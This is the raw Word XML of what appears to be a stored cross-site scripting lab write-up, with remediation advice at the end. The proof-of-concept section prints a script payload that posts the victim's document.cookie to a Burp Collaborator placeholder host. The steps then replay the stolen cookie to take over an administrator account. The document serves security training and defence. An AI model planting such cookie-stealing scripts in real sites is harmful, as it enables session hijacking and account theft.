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E4F71DA"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1E0828">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>stored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1E0828">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>comment box functionality</w:t>
      </w:r>
      <w:r w:rsidR="00212AC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a simulated victim user views all comments after they are posted.</w:t>
      </w:r>
      <w:r w:rsidR="005036F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> We will try to</w:t>
      </w:r>
      <w:r w:rsidR="00212AC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit the vulnerability to exfiltrate the victim’s session cookie and then use this cookie to impersonate that victim</w:t>
      </w:r>
      <w:r w:rsidR="005036F1">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190D8F8" w14:textId="48BF43A4" w:rsidR="003D523D" w:rsidRPr="008F76D3" w:rsidRDefault="007F5950"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and open any post.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53241555" w14:textId="1AF96EB9" w:rsidR="008F76D3" w:rsidRPr="00A062A5" w:rsidRDefault="008F76D3"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Post a comment with trash data but enter the payload into the comment box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA435BE" w14:textId="166D333D" w:rsidR="00A062A5" w:rsidRPr="00F24ADA" w:rsidRDefault="00A062A5"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It will force the application to make a POST HTTP request to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Collaborator Client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2420059B" w14:textId="4D1A62F8" w:rsidR="00F24ADA" w:rsidRPr="00F24ADA" w:rsidRDefault="00F24ADA"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We will get a couple of requests but we need to observe the HTTP request only and we’ll find a session cookie there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4906B7" w14:textId="0844DBB6" w:rsidR="00F24ADA" w:rsidRPr="005C275F" w:rsidRDefault="00F24ADA"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Copy the session cookie from there and try to replay the my-account request using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tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF6B568" w14:textId="16451130" w:rsidR="005C275F" w:rsidRDefault="005C275F"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Congratulations, we managed to break in the administrator’s account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2AF10A" w14:textId="77777777" w:rsidR="00FB7477" w:rsidRDefault="00FB7477" w:rsidP="00E050CA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3117D4FE" w14:textId="22F355AF"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40C051A3" w14:textId="77777777" w:rsidR="00FB7477" w:rsidRDefault="00FB7477" w:rsidP="00FB7477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D08C1D8" w14:textId="77777777" w:rsidR="00FB7477" w:rsidRDefault="00FB7477" w:rsidP="00FB7477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>fetch(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'https://BURP-COLLABORATOR-SUBDOMAIN', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440136F6" w14:textId="77777777" w:rsidR="00FB7477" w:rsidRDefault="00FB7477" w:rsidP="00FB7477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>method: 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA65DBF" w14:textId="77777777" w:rsidR="00FB7477" w:rsidRDefault="00FB7477" w:rsidP="00FB7477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>mode: 'no-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7267552E" w14:textId="77777777" w:rsidR="00FB7477" w:rsidRDefault="00FB7477" w:rsidP="00FB7477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>body:document</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="013BBC07" w14:textId="77777777" w:rsidR="00FB7477" w:rsidRDefault="00FB7477" w:rsidP="00FB7477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F35DD2" w14:textId="6BA904D3" w:rsidR="007C289E" w:rsidRPr="00921403" w:rsidRDefault="00FB7477" w:rsidP="00FB7477">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36552B72" w14:textId="77777777" w:rsidR="0069694E" w:rsidRPr="0069694E" w:rsidRDefault="0069694E" w:rsidP="0069694E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C7090B9" w14:textId="43B2EE1C" w:rsidR="0069694E" w:rsidRPr="0069694E" w:rsidRDefault="00187D55" w:rsidP="0069694E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00187D55">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="47859D34" wp14:editId="426578DF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>393065</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5495925" cy="923290"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="28295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58022" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5495925" cy="923290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0069694E" w:rsidRPr="0069694E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>PROOF OF CONCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056D0105" w14:textId="2CF4BAE7" w:rsidR="0069694E" w:rsidRPr="0069694E" w:rsidRDefault="0069694E" w:rsidP="0069694E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34D57B78" w14:textId="77777777" w:rsidR="009303B4" w:rsidRDefault="009303B4" w:rsidP="002F152E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E6331C2" w14:textId="0E56D928"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317ABED4" w14:textId="77777777" w:rsidR="000F56A4" w:rsidRPr="000F56A4" w:rsidRDefault="000F56A4" w:rsidP="000F56A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Input Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that any data which is written to the webpage, especially from user inputs, adheres to expected patterns or values. For instance, disallowing any script tags or special characters in comment fields if they're not necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF79B90" w14:textId="77777777" w:rsidR="000F56A4" w:rsidRPr="000F56A4" w:rsidRDefault="000F56A4" w:rsidP="000F56A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Output Encoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Before displaying user-generated content on the website, make sure it's safely encoded. For instance, characters like &lt;, &gt;, and &amp; should be displayed as &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>;,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>;, and &amp;amp; respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5217C744" w14:textId="77777777" w:rsidR="000F56A4" w:rsidRPr="000F56A4" w:rsidRDefault="000F56A4" w:rsidP="000F56A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Flag:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> For cookies, especially session cookies, set the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag. This makes the cookies inaccessible to JavaScript, preventing scripts from reading or transmitting these values elsewhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F017B7" w14:textId="77777777" w:rsidR="000F56A4" w:rsidRPr="000F56A4" w:rsidRDefault="000F56A4" w:rsidP="000F56A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Sandbox User Content:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> If possible, display user-generated content in a sandboxed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a separate domain. This can help to isolate any malicious code from sensitive operations and data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78AB9B" w14:textId="12F9BD3F" w:rsidR="002F152E" w:rsidRPr="000F56A4" w:rsidRDefault="000F56A4" w:rsidP="000F56A4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Use Nonce Tokens:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F56A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement nonce tokens in script tags. Nonces are random tokens added to scripts, and with a proper CSP, only scripts that have the correct nonce value will execute. This ensures that injected scripts won't execute even if they manage to bypass other safeguards.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002F152E" w:rsidRPr="000F56A4"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427BD6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4AB46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4"/>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589389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B26"/>
    <w:rsid w:val="00017D37"/>
    <w:rsid w:val="000316DD"/>
    <w:rsid w:val="00087DD8"/>
    <w:rsid w:val="00093FF4"/>
    <w:rsid w:val="000D5093"/>
    <w:rsid w:val="000D7CE5"/>
    <w:rsid w:val="000E4A5B"/>
    <w:rsid w:val="000F0291"/>
    <w:rsid w:val="000F4FE7"/>
    <w:rsid w:val="000F56A4"/>
    <w:rsid w:val="000F5F61"/>
    <w:rsid w:val="00115586"/>
    <w:rsid w:val="00146DDF"/>
    <w:rsid w:val="0015780E"/>
    <w:rsid w:val="00165B56"/>
    <w:rsid w:val="001768CB"/>
    <w:rsid w:val="00187D55"/>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6137F"/>
    <w:rsid w:val="00262D06"/>
    <w:rsid w:val="0028480B"/>
    <w:rsid w:val="00290689"/>
    <w:rsid w:val="002A1A1E"/>
    <w:rsid w:val="002A5040"/>
    <w:rsid w:val="002A7B99"/>
    <w:rsid w:val="002B0D4E"/>
    <w:rsid w:val="002C1EC0"/>
    <w:rsid w:val="002F152E"/>
    <w:rsid w:val="002F3625"/>
    <w:rsid w:val="002F54EB"/>
    <w:rsid w:val="00317C2D"/>
    <w:rsid w:val="003202F7"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="0033120F"/>
    <w:rsid w:val="003358E4"/>
    <w:rsid w:val="0036197C"/>
    <w:rsid w:val="0038106E"/>
    <w:rsid w:val="00385CF9"/>
    <w:rsid w:val="00392C30"/>
    <w:rsid w:val="003A5F44"/>
    <w:rsid w:val="003C1DDC"/>
    <w:rsid w:val="003D523D"/>
    <w:rsid w:val="00437C9B"/>
    <w:rsid w:val="00454915"/>
    <w:rsid w:val="00482A06"/>
    <w:rsid w:val="00495017"/>
    <w:rsid w:val="004C039A"/>
    <w:rsid w:val="004C075B"/>
    <w:rsid w:val="004C3608"/>
    <w:rsid w:val="004C37DD"/>
    <w:rsid w:val="004E26E8"/>
    <w:rsid w:val="005036F1"/>
    <w:rsid w:val="00513F5E"/>
    <w:rsid w:val="00523AE2"/>
    <w:rsid w:val="00532A89"/>
    <w:rsid w:val="00554D32"/>
    <w:rsid w:val="00557B86"/>
    <w:rsid w:val="0057090A"/>
    <w:rsid w:val="00591996"/>
    <w:rsid w:val="0059201C"/>
    <w:rsid w:val="005A5FE5"/>
    <w:rsid w:val="005B588A"/>
    <w:rsid w:val="005C275F"/>
    <w:rsid w:val="005E6AA5"/>
    <w:rsid w:val="005E7D42"/>
    <w:rsid w:val="006009AF"/>
    <w:rsid w:val="00620059"/>
    <w:rsid w:val="00626274"/>
    <w:rsid w:val="00631DB6"/>
    <w:rsid w:val="00640BC6"/>
    <w:rsid w:val="00675428"/>
    <w:rsid w:val="00682DCE"/>
    <w:rsid w:val="00686C72"/>
    <w:rsid w:val="00692320"/>
    <w:rsid w:val="0069694E"/>
    <w:rsid w:val="006B684D"/>
    <w:rsid w:val="006B7049"/>
    <w:rsid w:val="006C26C7"/>
    <w:rsid w:val="006E57C3"/>
    <w:rsid w:val="00705B8A"/>
    <w:rsid w:val="00713B95"/>
    <w:rsid w:val="007236F6"/>
    <w:rsid w:val="007244DD"/>
    <w:rsid w:val="0074089A"/>
    <w:rsid w:val="00774583"/>
    <w:rsid w:val="00782EF7"/>
    <w:rsid w:val="00792BB3"/>
    <w:rsid w:val="007977EA"/>
    <w:rsid w:val="007C289E"/>
    <w:rsid w:val="007F5950"/>
    <w:rsid w:val="008264C3"/>
    <w:rsid w:val="00857CA7"/>
    <w:rsid w:val="0086200C"/>
    <w:rsid w:val="00864B78"/>
    <w:rsid w:val="008666AA"/>
    <w:rsid w:val="008862F8"/>
    <w:rsid w:val="00893E8D"/>
    <w:rsid w:val="008B60AF"/>
    <w:rsid w:val="008C0C10"/>
    <w:rsid w:val="008C2054"/>
    <w:rsid w:val="008F18C8"/>
    <w:rsid w:val="008F30FF"/>
    <w:rsid w:val="008F755A"/>
    <w:rsid w:val="008F76D3"/>
    <w:rsid w:val="00903595"/>
    <w:rsid w:val="00914F8A"/>
    <w:rsid w:val="00916E37"/>
    <w:rsid w:val="00917626"/>
    <w:rsid w:val="00921403"/>
    <w:rsid w:val="009303B4"/>
    <w:rsid w:val="00933DCA"/>
    <w:rsid w:val="0094184C"/>
    <w:rsid w:val="00950F42"/>
    <w:rsid w:val="00962C00"/>
    <w:rsid w:val="009662AA"/>
    <w:rsid w:val="009764B7"/>
    <w:rsid w:val="009F411A"/>
    <w:rsid w:val="00A062A5"/>
    <w:rsid w:val="00A071F4"/>
    <w:rsid w:val="00A35B3A"/>
    <w:rsid w:val="00A44CF7"/>
    <w:rsid w:val="00A834AE"/>
    <w:rsid w:val="00A83ED9"/>
    <w:rsid w:val="00AA2AE9"/>
    <w:rsid w:val="00B026F1"/>
    <w:rsid w:val="00B03E11"/>
    <w:rsid w:val="00B112CB"/>
    <w:rsid w:val="00B2193E"/>
    <w:rsid w:val="00B33405"/>
    <w:rsid w:val="00B45D8B"/>
    <w:rsid w:val="00B47073"/>
    <w:rsid w:val="00B47E54"/>
    <w:rsid w:val="00B57949"/>
    <w:rsid w:val="00BA7C57"/>
    <w:rsid w:val="00BB5CA6"/>
    <w:rsid w:val="00BC1739"/>
    <w:rsid w:val="00BC7780"/>
    <w:rsid w:val="00BD3EE9"/>
    <w:rsid w:val="00BD4233"/>
    <w:rsid w:val="00BE0CC0"/>
    <w:rsid w:val="00BF2868"/>
    <w:rsid w:val="00C44B26"/>
    <w:rsid w:val="00C46CCB"/>
    <w:rsid w:val="00C61158"/>
    <w:rsid w:val="00C74415"/>
    <w:rsid w:val="00C84C96"/>
    <w:rsid w:val="00CB43ED"/>
    <w:rsid w:val="00CD3D3A"/>
    <w:rsid w:val="00CF4E92"/>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5637"/>
    <w:rsid w:val="00E36C66"/>
    <w:rsid w:val="00E64623"/>
    <w:rsid w:val="00E71825"/>
    <w:rsid w:val="00E86B4D"/>
    <w:rsid w:val="00EA6346"/>
    <w:rsid w:val="00EA760C"/>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9333">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467283776">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 w:id="206039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15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-13T11:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T11:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>